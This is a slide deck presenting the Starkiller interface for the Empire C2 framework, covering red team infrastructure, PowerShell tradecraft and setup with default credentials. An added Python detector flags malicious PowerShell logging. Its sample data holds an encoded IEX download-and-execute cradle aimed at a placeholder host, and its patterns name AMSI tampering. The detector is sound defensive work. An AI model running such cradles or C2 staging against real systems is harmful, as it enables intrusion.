Adversary Emulation


A Red Team exercise that emulates how adversaries operate and follows similar tactics, techniques, and procedures (TTPs) to obtain a specific objective.


Red Team Infrastructure

• Stage payloads, control implants, and store target data just like Advanced Persistent Threats (APTs)

• We don't want the discovery of a single domain or endpoint to compromise the whole operation

It's how real adversaries run their operations
What is Starkiller?

• Intuitive Command and Control (C2) Interface
• Multi-User Support
• On-the-fly Reporting
• Simplified Workflows
[Screenshot: Starkiller "New Stager" form. Author: @xorrior. Description: Generates an Empire Application. Fields visible: Listener (http), x64, Language (python), OutFile (/tmp/out.zip), SafeChecks. Footer: Copyright (c) 2020 BC Security | Starkiller | Empire]


Empire

• Post-Exploitation Framework built around PowerShell and Python
• Can be run as a Team Server or All-in-one C2
• Adaptive Modules
• Original project ended support in August 2019
• Still being maintained as a Fork by us
  https://github.com/BC-SECURITY/Empire


Why PowerShell?

• Gives Full .NET Access
• Direct access to Win32 API
• Operates in Memory
• Installed by default in Windows

Quoted tweet:

  Red teams and MS: Powershell abuse is totally played out. Glad that problem is solved.

  Real world criminal groups and most APT attackers: STILL POWERSHELL ALL DAY BABY

  (Meaning: actually make sure you have PS abuse well-defended before you worry about the latest C# hotness.)


Quoted tweet:

  ClearSky Cyber Security @ClearskySec - Dec 23, 2019

  #OilRig targets LANDesk Agent users via PowDesk - New PowerShell-based malware resembles QUADAGENT.

  PowDesk checks for the presence of LANDesk Agent folder and service before C&C beacon.

  Full analysis coming soon.

  virustotal.com/gui/file/8406c...
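The "Why PowerShell?" bullets (in-memory execution, full .NET access, installed by default) and the quoted advice to get PowerShell abuse well defended first describe the defender's side of this slide. As an added example, not code from the Empire or Starkiller projects or from the deck, here is a small Python triage routine that scans constructed PowerShell Script Block Logging (event 4104) text for exactly those traits: encoded commands (decoded from UTF-16LE base64 before matching), download cradles, Invoke-Expression and reflective assembly loading. The indicator list, the sample lines and the function names are this example's own assumptions, not telemetry from any real host.

```python
"""Flag PowerShell Script Block Logging entries that show in-memory tooling.

Added example (not code from the Empire/Starkiller project).  Assumptions:
the log lines below are constructed here and mimic the ScriptBlockText field
of Windows event 4104; the indicator names and patterns are the author's own.
"""
import base64
import re

# Indicators that a script block stages code in memory rather than on disk.
# Each entry: (indicator name, compiled case-insensitive regex).
INDICATORS = [
    ("encoded-command",
     re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("invoke-expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("web-download",
     re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    ("reflective-load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I)),
    ("amsi-tamper", re.compile(r"AmsiUtils|amsiInitFailed", re.I)),
]

# Captures the base64 argument of -e / -enc / -EncodedCommand.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(text):
    """Return the decoded payload of a -EncodedCommand argument, or None.

    PowerShell expects base64 over UTF-16LE text, so decode in that order.
    Anything that is not valid base64/UTF-16LE is treated as "no payload".
    """
    match = ENCODED_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(text):
    """Return the sorted list of indicator names matching one script block.

    Both the raw text and any decoded -EncodedCommand payload are scanned, so
    a cradle hidden behind -enc is still attributed to the original entry.
    """
    hits = set()
    candidates = [text]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        candidates.append(decoded)
    for candidate in candidates:
        for name, pattern in INDICATORS:
            if pattern.search(candidate):
                hits.add(name)
    return sorted(hits)


def triage(lines):
    """Return [(line_number, indicators)] for every line with at least one hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = scan_script_block(line)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample of ScriptBlockText values (not real telemetry).  The
# cradle points at the reserved .invalid TLD so it resolves nowhere.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_LINES = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "powershell.exe -NoP -W Hidden -enc "
    + base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode(),
    "[System.Reflection.Assembly]::Load($bytes) | Out-Null",
    "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties mail",
]

if __name__ == "__main__":
    for line_number, hits in triage(SAMPLE_LINES):
        print(f"line {line_number}: {', '.join(hits)}")
```

Running it flags lines 2 and 3 of the sample and leaves the two administrative one-liners alone. The decode step is the part worth keeping: matching only on the raw text would miss the second line entirely, because every indicator in it sits inside the base64 blob. In production the same function would be fed the ScriptBlockText field from a log pipeline rather than a hard-coded list.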


https://github.com/BC-SECURITY/Starkiller


Red Team Infrastructure w/Starkiller

[Diagram: components labelled Starkiller, Redirector 1, Empire Server (AWS Server), Target, Redirector, Starkiller]


Starkiller

• Remote control of Empire (from a distance)
• Option to run solo or as a team
• Goal:
  1. More efficient Red Team workflows
  2. Team-oriented engagements

[Diagram: Starkiller and Empire Server exchanging JSON over GET/POST and PUT/DELETE requests]


Starkiller Setup

• Run Empire with its API
  ./empire --rest
• Default login
  Username: empireadmin
  Password: password123
• Multiplatform
  Windows
  MacOS
  Linux
DEMO TIME


https://github.com/BC-SECURITY/Starkiller 
Questions?


DS RITY.ORG

@BCSECURITY1
HTTPS://GITHUB.COM/BC-SECURITY/STARKILLER